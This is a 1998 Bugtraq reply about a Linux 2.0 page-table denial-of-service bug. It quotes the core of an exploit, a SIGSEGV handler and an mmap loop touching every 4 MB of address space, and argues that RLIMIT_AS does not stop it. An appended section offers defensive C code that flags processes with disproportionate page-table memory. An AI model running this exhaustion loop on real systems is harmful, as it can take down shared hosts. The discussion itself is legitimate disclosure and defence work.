[6857] in bugtraq

Re: linux 2.0 PTE bug

daemon@ATHENA.MIT.EDU (Pavel Kankovsky)
Fri May 29 12:54:42 1998

Date: 	Thu, 28 May 1998 21:23:34 +0200
Reply-To: peak@kerberos.troja.mff.cuni.cz
From: Pavel Kankovsky <peak@KERBEROS.TROJA.MFF.CUNI.CZ>
X-To:         pedward@WEBCOM.COM
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <199805262111.OAA25893@s1000e2>

On Tue, 26 May 1998 pedward@WEBCOM.COM wrote:

> (it really has nothing to do with resources).  The main factor is RLIMIT_AS,
> defined in /usr/src/linux/include/asm/resource.h, it controls how much virtual
> memory that a process can map, mmap utilizes virtual memory.  You can
> safely throttle people by running a program which calls setrlimit(2) with
> RLIMIT_AS as the resource.  By far, 3GB is too much.
>
> This is only a DoS if you LET it be a DoS.
>

No. Re-read the program carefully:

<quote author="p6mip300@INFOP6.CICRP.JUSSIEU.FR">

void the_handler(int x)
{
  signal(SIGSEGV, the_handler);

  touch_me++;

  if(mmap((void *)address, 4, PROT_READ,
        MAP_FIXED|MAP_PRIVATE, fd, 0)==(void *)-1) {
    perror("mmap");
    exit(1);
  }
}

void main(void)
{
[...]
  signal(SIGSEGV, the_handler);

  /* 3*1024*1024*1024 = TASK_SIZE,
   * 1024*4096 = number of bytes one pte can map */
  for (address=0; address<3*1024*1024*1024; address+=1024*4096) {
    i=*(unsigned long *)address;
    if (touch_me) {
      touch_me=0;
      munmap((void *)address, 4);
    }
  }
[...]
}

</quote>

The program allocates ONE page for each 4MB block of address space. This
makes 768 pages (3MB). It would hardly hit a (reasonable) AS limit even if
it did not disallocate the page having touched it.

It can run with RLIMIT_AS set to 1MB. At least on my system--I have
tried it (according to /proc/*/status, VmSize was 904 kB).


--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
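
The arithmetic in the reply above, and a check an administrator could run against it, as an added example that is not part of the original post or thread. It assumes a later Linux kernel whose /proc/<pid>/status reports a VmPTE line next to VmSize, and i386 with 4 kB pages. The function names, the 10% threshold and both sample status texts are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Constructed samples in /proc/<pid>/status layout (not captured output). */
static const char SAMPLE_SPARSE[] =
    "Name:\tsparse\nVmSize:\t     904 kB\nVmPTE:\t    3072 kB\n";
static const char SAMPLE_DENSE[] =
    "Name:\tdense\nVmSize:\t    4520 kB\nVmPTE:\t      48 kB\n";

/* Value in kB of "<key>:" in a status text, or -1 if the field is absent. */
static long status_kb(const char *status, const char *key)
{
    size_t klen = strlen(key);
    const char *line = status;
    long kb;
    while (line && *line) {
        if (strncmp(line, key, klen) == 0 && line[klen] == ':')
            return sscanf(line + klen + 1, "%ld", &kb) == 1 ? kb : -1;
        line = strchr(line, '\n');
        if (line) line++;
    }
    return -1;
}

/* Page-table memory (kB) if each 4 MB slot of span_kb is touched once:
 * on i386 one 4 kB page table covers 1024 * 4096 bytes, as in the quoted loop. */
long worst_case_pte_kb(long span_kb)
{
    return (span_kb / 4096) * 4;
}

/* 1 if VmPTE exceeds max_percent of VmSize, 0 if not, -1 if a field is missing. */
int pte_out_of_proportion(const char *status, long max_percent)
{
    long vmsize = status_kb(status, "VmSize");
    long vmpte = status_kb(status, "VmPTE");
    if (vmsize <= 0 || vmpte < 0)
        return -1;
    return vmpte * 100 > vmsize * max_percent;
}

int main(void)
{
    printf("3 GB worst case: %ld kB of page tables\n",
           worst_case_pte_kb(3L * 1024 * 1024));
    printf("sparse=%d dense=%d\n", pte_out_of_proportion(SAMPLE_SPARSE, 10),
           pte_out_of_proportion(SAMPLE_DENSE, 10));
    return 0;
}
```

The 3 GB case yields 768 page tables (3072 kB), the same 768 pages (3MB) counted in the reply, while VmSize, the figure RLIMIT_AS constrains, stays small.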
